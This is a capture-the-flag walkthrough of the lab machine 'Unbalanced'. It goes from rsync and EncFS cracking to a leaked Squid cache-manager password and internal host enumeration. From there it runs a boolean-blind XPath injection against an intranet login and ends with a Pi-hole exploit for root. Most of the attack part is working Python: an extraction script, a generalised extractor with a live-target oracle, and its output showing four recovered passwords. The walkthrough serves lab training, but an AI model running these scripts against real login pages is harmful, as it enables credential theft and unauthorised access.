
Recon: only three ports are open, so the attack surface is ssh, an rsync daemon and a Squid proxy.

```
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 03:27 EDT
Nmap scan report for 10.10.10.200
Host is up (0.0041s latency).

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 a2:76:5c:b0:88:6f:9e:62:e8:83:51:e7:cf:bf:2d:f2 (RSA)
|   256 d0:65:fb:f6:3e:11:b1:d6:e6:f7:5e:c0:15:0c:0a:77 (ECDSA)
|_  256 5e:2b:93:59:1d:49:28:8d:43:2c:c1:f7:e3:37:0f:83 (ED25519)
873/tcp  open  rsync      (protocol version 31)
3128/tcp open  http-proxy Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.10 seconds
```

The entry point has to be either rsync or Squid. It turns out to be rsync: listing the daemon's modules without credentials shows an anonymously readable share.

```
# root @ kali in ~/hackthebox/machines/unbalanced [5:02:36]
$ rsync rsync://unbalanced.htb
conf_backups   EncFS-encrypted configuration backups
```

Pull the whole conf_backups module down to the local machine:

```
rsync -avzh rsync://unbalanced.htb/conf_backups ./conf_backups
```

The file names look random, but the directory also contains a .encfs6.xml file, which means the backup is an EncFS volume. The encrypted volume key and the salt are both stored in that XML file, so the only secret protecting the data is the user's password. encfs2john.py (it takes the directory holding .encfs6.xml) extracts a john-compatible hash from it; john cracks the password offline; encfs then mounts the volume with the recovered password and exposes the decrypted files:

```
encfs /root/hackthebox/machines/unbalanced/conf_backups /root/hackthebox/machines/unbalanced/conf_backups_dec
```

The file that matters is squid.conf, the Squid configuration. It is mostly comment lines; in vim the search /^[^#] jumps only to lines whose first character is not #, which skips the comments. The useful directives are:

```
# Allow access to intranet
acl intranet dstdomain -n intranet.unbalanced.htb
acl intranet_net dst -n 172.16.0.0/12
http_access allow intranet
http_access allow intranet_net
# The lines above define which internal destinations the proxy will forward to:
# the hostname intranet.unbalanced.htb and the whole 172.16.0.0/12 range.

cachemgr_passwd Thah$Sh1 menu pconn mem diskd fqdncache filedescriptors objects vm_objects counters 5min 60min histograms cbdata sbuf events
cachemgr_passwd disable all
# The line above leaks the cachemgr password; the listed actions are the
# cache manager pages this password unlocks, everything else is disabled.
```

Going through the target's Squid proxy, intranet.unbalanced.htb is reachable, but there is nothing useful on it.

Next, talk to the cache manager with squidclient, using the leaked password. The mgr:menu page lists which actions are password-protected, and mgr:fqdncache dumps the proxy's reverse-DNS cache, which reveals internal hostnames it has resolved:

```
# root @ kali in ~/hackthebox/machines/unbalanced [6:38:26] C:130
$ squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:menu | grep protected
 menu                   Cache Manager Menu                              protected
 pconn                  Persistent Connection Utilization Histograms    protected
 mem                    Memory Utilization                              protected
 diskd                  DISKD Stats                                     protected
 fqdncache              FQDN Cache Stats and Contents                   protected
 filedescriptors        Process Filedescriptor Allocation               protected
 objects                All Cache Objects                               protected
 vm_objects             In-Memory and In-Transit Objects                protected
 counters               Traffic and Resource Counters                   protected
 5min                   5 Minute Average of Counters                    protected
 60min                  60 Minute Average of Counters                   protected
 histograms             Full Histogram Counts                           protected
 cbdata                 Callback Data Registry Contents                 protected
 sbuf                   String-Buffer statistics                        protected
 events                 Event Queue                                     protected

# root @ kali in ~/hackthebox/machines/unbalanced [6:38:30]
$ squidclient -h 10.10.10.200 -w 'Thah$Sh1' mgr:fqdncache
HTTP/1.1 200 OK
Server: squid/4.6
Mime-Version: 1.0
Date: Tue, 11 Aug 2020 10:38:50 GMT
Content-Type: text/plain;charset=utf-8
Expires: Tue, 11 Aug 2020 10:38:50 GMT
Last-Modified: Tue, 11 Aug 2020 10:38:50 GMT
X-Cache: MISS from unbalanced
X-Cache-Lookup: MISS from unbalanced:3128
Via: 1.1 unbalanced (squid/4.6)
Connection: close

FQDN Cache Statistics:
FQDNcache Entries In Use: 10
FQDNcache Entries Cached: 9
FQDNcache Requests: 5
FQDNcache Hits: 0
FQDNcache Negative Hits: 1
FQDNcache Misses: 4
FQDN Cache Contents:

Address                                       Flg TTL Cnt Hostnames
127.0.1.1                                      H -001   2 unbalanced.htb unbalanced
10.10.14.36                                    N  052   0
::1                                            H -001   3 localhost ip6-localhost ip6-loopback
172.31.179.2                                   H -001   1 intranet-host2.unbalanced.htb
172.31.179.3                                   H -001   1 intranet-host3.unbalanced.htb
127.0.0.1                                      H -001   1 localhost
172.17.0.1                                     H -001   1 intranet.unbalanced.htb
ff02::1                                        H -001   1 ip6-allnodes
ff02::2                                        H -001   1 ip6-allrouters
```

Note that intranet-host2.unbalanced.htb maps to the internal address 172.31.179.2 and intranet-host3.unbalanced.htb to 172.31.179.3. The numbering suggests there is also an intranet-host1.unbalanced.htb at 172.31.179.1 that the proxy simply has not resolved recently; the address falls inside the 172.16.0.0/12 range the ACL allows, so it can be reached through the proxy directly:
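The inference above can be automated. The following is an added example, not part of the original writeup: it parses the "FQDN Cache Contents" table that squidclient mgr:fqdncache prints, keeps the private IPv4 entries (the ones only reachable through the proxy), and, for hostnames following the intranet-hostN pattern, proposes the addresses of the numbered hosts that are missing from the cache. The sample text is the table from the output above, embedded as a constructed string; the assumption that host number N sits on last octet N is exactly what the two cached entries show and is labelled as such in the code.

```python
import ipaddress
import re

# Constructed sample: the table portion of squidclient mgr:fqdncache,
# with the values from the dump shown above.
SAMPLE = """\
FQDN Cache Contents:

Address Flg TTL Cnt Hostnames
127.0.1.1 H -001 2 unbalanced.htb unbalanced
10.10.14.36 N 052 0
::1 H -001 3 localhost ip6-localhost ip6-loopback
172.31.179.2 H -001 1 intranet-host2.unbalanced.htb
172.31.179.3 H -001 1 intranet-host3.unbalanced.htb
127.0.0.1 H -001 1 localhost
172.17.0.1 H -001 1 intranet.unbalanced.htb
ff02::1 H -001 1 ip6-allnodes
ff02::2 H -001 1 ip6-allrouters
"""

# address, flag (H = hit, N = negative), TTL, count, then zero or more hostnames
ROW = re.compile(r"^(\S+)\s+([HN])\s+(-?\d+)\s+(\d+)((?:\s+\S+)*)\s*$")


def parse_fqdncache(text):
    """Return {address: [hostnames]} for every row after the 'Address' header line."""
    entries = {}
    in_table = False
    for line in text.splitlines():
        if line.startswith("Address"):
            in_table = True
            continue
        if not in_table or not line.strip():
            continue
        m = ROW.match(line)
        if m:
            addr, _flag, _ttl, _cnt, names = m.groups()
            entries[addr] = names.split()
    return entries


def internal_hosts(entries):
    """Keep private, non-loopback IPv4 entries: the hosts you can only reach via the proxy."""
    out = {}
    for addr, names in entries.items():
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            continue
        if ip.version == 4 and ip.is_private and not ip.is_loopback:
            out[addr] = names
    return out


def guess_siblings(entries, prefix="intranet-host"):
    """For names like <prefix>N.<domain>, propose (name, address) for the missing N.

    Assumption (taken from the two cached entries, not guaranteed in general):
    host number N lives at last octet N of the same /24.
    """
    pat = re.compile(r"^%s(\d+)\.(.+)$" % re.escape(prefix))
    seen = {}      # host number -> address
    domain = None
    for addr, names in entries.items():
        for name in names:
            m = pat.match(name)
            if m:
                seen[int(m.group(1))] = ipaddress.ip_address(addr)
                domain = m.group(2)
    if not seen:
        return []
    net = ipaddress.ip_interface("%s/24" % next(iter(seen.values()))).network
    guesses = []
    for n in range(1, max(seen) + 1):
        if n not in seen:
            guesses.append(("%s%d.%s" % (prefix, n, domain),
                            str(net.network_address + n)))
    return guesses


if __name__ == "__main__":
    cache = parse_fqdncache(SAMPLE)
    for addr, names in internal_hosts(cache).items():
        print(addr, " ".join(names))
    for name, addr in guess_siblings(cache):
        print("candidate:", name, addr)
```

On the sample this yields the four private addresses (the attacker's own 10.10.14.36 among them, because the proxy resolved it too) and the single candidate intranet-host1.unbalanced.htb at 172.31.179.1, which is what the next curl verifies.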

```
# root @ kali in ~/hackthebox/machines/unbalanced [6:40:04]
$ curl -x 10.10.10.200:3128 http://172.31.179.1/
Host temporarily taken out of load balancing for security maintenance.
```

The host exists and has only been pulled out of the load balancer. http://172.31.179.1/intranet.php is the same login page as on the other hosts, but this copy is vulnerable to XPath injection (see https://websec.readthedocs.io/zh/latest/vuln/xpath.html): the login succeeds and the page shows the user's email address whenever the injected predicate is true, which gives a boolean oracle to extract the stored passwords character by character.

Script to extract the passwords through the proxy, one character per request:

```python
import string
import requests

# Characters tried at each position: digits, letters and punctuation
# (string.punctuation is the same set the hand-written string contained,
# without the invalid "\]" escape).
fuzz = string.digits + string.ascii_letters + string.punctuation

# Requests go through the target's Squid proxy, which is the only route to 172.31.179.1
proxy = {
    'http': 'http://unbalanced.htb:3128',
}

for name in ['rita', 'jim', 'bryan', 'sarah']:
    password = ''
    for i in range(1, 30):
        password1 = password   # stays unchanged if no character matches at position i
        for j in fuzz:
            # Boolean-blind XPath injection: the login only succeeds when the
            # i-th character of this user's Password equals j. (A literal single
            # quote in j would break the payload; none of these passwords has one.)
            check = "' or substring(Password,{},1)='{}' or '".format(i, j)
            data = {'Username': name, 'Password': check}
            r = requests.post("http://172.31.179.1/intranet.php", proxies=proxy, data=data)
            if "{}@unbalanced.htb".format(name) in r.text:
                password1 = password + str(j)
                print(password1)
                break
        if password == password1:
            break              # nothing matched at this position: end of the password
        password = password1
    print("{} {}".format(name, password))
```

```
# root @ kali in ~/hackthebox/machines/unbalanced [6:43:12]
$ python injection.py
p
pa
pas
pass
passw
passwo
passwor
password
password0
password01
password01!
rita password01!
s
st
sta
stai
stair
stairw
stairwa
stairway
stairwayt
stairwayto
stairwaytoh
stairwaytohe
stairwaytohea
stairwaytoheav
stairwaytoheave
stairwaytoheaven
jim stairwaytoheaven
i
ir
ire
irea
ireal
ireall
ireally
ireallyl
ireallyl0
ireallyl0v
ireallyl0ve
ireallyl0veb
ireallyl0vebu
ireallyl0vebub
ireallyl0vebubb
ireallyl0vebubbl
ireallyl0vebubble
ireallyl0vebubbleg
ireallyl0vebubblegu
ireallyl0vebubblegum
ireallyl0vebubblegum!
ireallyl0vebubblegum!!
ireallyl0vebubblegum!!!
bryan ireallyl0vebubblegum!!!
s
sa
sar
sara
sarah
sarah4
sarah4e
sarah4ev
sarah4eva
sarah4evah
sarah sarah4evah
```
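The script above assumes every password is shorter than 30 characters and contains no quote character. As an added example (not the writeup's own code), the following generalises the same boolean-blind XPath extraction: it first asks the oracle for string-length(Password) so the loop knows exactly how many positions to recover, and it emits each candidate character as a double-quoted XPath literal when the character is a single quote (XPath 1.0 has no escape sequence inside string literals). The oracle is abstracted into a callable so the logic can be exercised offline against a constructed stand-in that answers the two payload shapes the way the backend would; http_oracle wires the same logic to the real page through the proxy and is only used when you point it at a live target.

```python
import re
import string

# Same candidate set as the script above
CHARSET = string.digits + string.ascii_letters + string.punctuation


def xpath_literal(ch):
    """Quote a one-character XPath string literal; a single quote needs double quotes."""
    return '"%s"' % ch if ch == "'" else "'%s'" % ch


def length_payload(n):
    return "' or string-length(Password)=%d or '" % n


def char_payload(pos, ch):
    # pos is 1-based, as XPath substring() expects
    return "' or substring(Password,%d,1)=%s or '" % (pos, xpath_literal(ch))


def extract_password(oracle, max_len=64):
    """Recover Password via a boolean oracle: length first, then one character per position."""
    length = None
    for n in range(1, max_len + 1):
        if oracle(length_payload(n)):
            length = n
            break
    if length is None:
        return None                       # longer than max_len or oracle never fires
    recovered = ""
    for pos in range(1, length + 1):
        for ch in CHARSET:
            if oracle(char_payload(pos, ch)):
                recovered += ch
                break
        else:
            raise ValueError("no candidate matched at position %d" % pos)
    return recovered


def fake_oracle(secret):
    """Constructed stand-in for intranet.php: evaluates the two injected predicates
    against a known secret, exactly as //user[Username='x' and Password='<payload>']
    would resolve them on the server."""
    len_re = re.compile(r"string-length\(Password\)=(\d+)")
    sub_re = re.compile(r"substring\(Password,(\d+),1\)=(?:'(.)'|\"(.)\")")

    def oracle(payload):
        m = len_re.search(payload)
        if m:
            return len(secret) == int(m.group(1))
        m = sub_re.search(payload)
        if m:
            pos = int(m.group(1))
            ch = m.group(2) if m.group(2) is not None else m.group(3)
            return pos <= len(secret) and secret[pos - 1] == ch
        return False
    return oracle


def http_oracle(username, url="http://172.31.179.1/intranet.php",
                proxy="http://unbalanced.htb:3128"):
    """Oracle against the live page: success is the user's email appearing in the response."""
    import requests   # only needed for a live target, so imported lazily

    def oracle(payload):
        r = requests.post(url, proxies={"http": proxy},
                          data={"Username": username, "Password": payload}, timeout=10)
        return "%s@unbalanced.htb" % username in r.text
    return oracle


if __name__ == "__main__":
    # Offline demonstration with the constructed oracle; swap in
    # http_oracle("sarah") to run the same extraction against the target.
    print(extract_password(fake_oracle("sarah4evah")))
```

Knowing the length up front also turns an unbounded scan into a fixed number of requests: for a 10-character password that is at most 10 length probes plus 10 × len(CHARSET) character probes, and a password containing ' or " is recovered intact instead of silently truncated.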

Of the four recovered passwords, bryan : ireallyl0vebubblegum!!! works for ssh on the target.

On the box, a Docker container runs locally hosting Pi-hole. A matching exploit is available at https://www.exploit-db.com/exploits/48519.

After getting into the container, locate the configuration file; the password stored in it is the root password on the host, so it logs in as root directly.